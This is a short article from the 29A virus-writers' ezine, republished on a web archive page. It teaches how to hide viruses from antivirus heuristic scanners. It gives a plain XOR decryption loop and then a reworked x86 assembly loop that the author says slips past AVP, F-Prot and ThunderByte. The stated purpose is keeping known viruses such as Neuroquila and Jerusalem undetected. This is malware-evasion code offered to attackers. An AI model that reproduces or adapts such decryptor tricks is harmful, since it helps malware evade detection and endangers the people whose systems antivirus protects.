Copy Link
Add to Bookmark
Report

29A Issue 01 03 02

eZine's profile picture
Published in 
29A
 · 4 years ago

  

Antiheuristics
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ>
AVV

We're used to the newest antivirus promising a total protection against
unknown viruses, with what they call heuristics. And though being an im-
portant weapon against viruses, it isn't that safe they assure. We won't
explain what heuristics are (it is just looking for several instructions
common to all viruses, which will show their presence). Nevertheless, if
we hide these instructions, the antivirus won't detect anything and will
happily say there's no danger, when checking a modified version of Neuro-
quila, Tremor, Zhengxi, etc., which will be encrypted for these AVs.

Technique is easy. We just have to use a simple encryption routine with
which the antivirus will note nothing. AVP, F-Prot and ThunderByte recog-
nize several encryption routines. Now, the following routine decrypts a
previously encrypted code:


lea di,enc_start ; ds:di -> first encrypted byte
mov cx,enc_size ; cx has code's length
loop1: mov al,byte ptr es:[di]
xor al,0cfh ; we'll simply xor each byte
stosb ; and store it back
loop loop1


This routine is easy to get caught by an antivirus, and will discover the
hidden virus. But let's change slightly the routine:


lea di,enc_start
mov si,di
mov cx,enc_size
mov dh,0cfh
loop1: xor byte ptr es:[di],dh
movsb
loop loop1


This routine does exactly the same, but isn't caught by the heuristic
scan of any antivirus, so no crappy AV will decrypt anything, and our vi-
rus won't be detected... :) If the programmer is careful of not using any
garbage code, all the AVs will fail to detect any virus, no matter how
famous it is... even Jerusalem! :) This demonstrates that heuristics are
not as safe as they appear to be.


Greets,
AVV.

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT